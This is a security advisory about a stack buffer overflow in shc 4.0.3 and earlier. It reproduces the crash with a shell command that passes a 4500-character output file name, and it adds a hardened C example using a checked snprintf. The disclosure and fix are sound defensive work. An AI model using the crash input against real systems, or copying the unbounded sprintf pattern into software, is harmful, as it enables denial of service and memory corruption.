BUG_Author: s0l42
Affected Version: shc ≤ 4.0.3
Vendor: shc GitHub Repository
Software: shc
Vulnerability Files: src/shc.c
Stack Overflow:
In src/shc.c, the function make does not check the file name length and uses sprintf to format the user input file2 into cmd, whose size is 4096. A file name longer than the buffer therefore causes a stack overflow.
$ touch 1.sh
$ echo '#!/bin/sh\\nls' > 1.sh
$ ./shc -f 1.sh -o `python -c "print('a'*4500)"`
If successful, a segmentation fault occurs.
Inspecting the stack shows it completely filled with 0x61 ('a').
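
The fix pattern for the bug described above, as an added example that is not shc's own code: the command is built with snprintf and the return value is checked, so an over-long output name is rejected instead of overflowing cmd. The names build_cmd and CMD_SIZE, the "cc %s -o %s" format and the sample file names are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define CMD_SIZE 4096   /* size of cmd as stated in the advisory */

/*
 * Vulnerable pattern described above (kept as a comment only):
 *     char cmd[CMD_SIZE];
 *     sprintf(cmd, "cc %s -o %s", src, file2);   // no bound on file2
 *
 * Hardened form: snprintf never writes more than `size` bytes, and its
 * return value tells us whether the output would have been truncated.
 * Returns 0 on success, -1 if the command does not fit or on error.
 * The "cc %s -o %s" format is a constructed stand-in, not shc's own.
 */
int build_cmd(char *cmd, size_t size, const char *src, const char *file2)
{
    int n;

    if (cmd == NULL || size == 0 || src == NULL || file2 == NULL)
        return -1;

    n = snprintf(cmd, size, "cc %s -o %s", src, file2);
    if (n < 0 || (size_t)n >= size) {
        cmd[0] = '\0';      /* never leave a truncated command behind */
        return -1;
    }
    return 0;
}

int main(void)
{
    char cmd[CMD_SIZE];
    char longname[4501];

    /* Constructed input: 4500 'a' bytes, as in the reproduction above. */
    memset(longname, 'a', sizeof(longname) - 1);
    longname[sizeof(longname) - 1] = '\0';

    if (build_cmd(cmd, sizeof(cmd), "1.sh.x.c", longname) != 0)
        fprintf(stderr, "output file name too long, refusing\n");

    if (build_cmd(cmd, sizeof(cmd), "1.sh.x.c", "1.sh.x") == 0)
        printf("%s\n", cmd);
    return 0;
}
```

Rejecting the input outright, rather than running a silently truncated command, keeps the tool from invoking the compiler with a different output path than the user asked for.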